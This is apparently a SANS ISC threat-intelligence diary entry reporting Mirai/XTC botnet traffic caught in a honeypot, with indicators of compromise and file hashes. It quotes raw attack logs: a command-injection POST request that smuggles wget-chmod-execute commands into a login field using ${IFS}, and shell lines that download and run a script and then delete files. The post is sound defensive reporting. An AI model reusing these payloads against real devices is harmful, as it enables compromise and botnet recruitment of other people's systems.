Mirai Botnet Activity

Published: 2020-06-13
Last Updated: 2020-06-13 18:35:15 UTC
by Guy Bruneau (Version: 1)
0 comment(s)

This past week, I noticed new activity from the Mirai botnet in my honeypot. The sample log with the IP and file associated with the first log appears to have been taken down ( which appeared multiple times this week including today. However, the last two logs from today are still active which is using a Bash script to download multiple exploits targeting various device types (MIPS, ARM4-7, MPSL, x86, PPC, M68k). Something else of interest is the User-Agent: XTC and the name viktor which appear to be linked to XTC IRC Botnet, aka Hoaxcalls.

  • 20200613-025717: data 'POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nUser-Agent: XTC\r\nHost:\r\nContent-Length: 189\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\naction=login&keyPath='wget${IFS}${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'&loginUser=a&loginPwd=a\r\n\r\n'
  • 20200613-101614: data 'cd /tmp; wget; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'
  • 20200613-101617: data 'cd /tmp; wget; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'

Indicators of Compromise

  • http://96.30.193[.]26/arm7
  • http://185.172.111[.]214/8UsA[.]sh
  • User-Agent: XTC

Suspisious Files and Scripts:

  • UnHAnaAW.sh4 - 5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1
  • 8UsA.sh - 590d00e051703e55be2ad10fa94eadc499262bf8a62190a648a7a2756fd31862

[1] https://www.virustotal.com/gui/file/5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1/detection
[2] https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
[3] https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/
[4] https://isc.sans.edu/ipinfo.html?ip=
[5] https://isc.sans.edu/ipinfo.html?ip=
[6] https://isc.sans.edu/ipinfo.html?ip=
[7] https://isc.sans.edu/ipinfo.html?ip=

Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

0 comment(s)


Diary Archives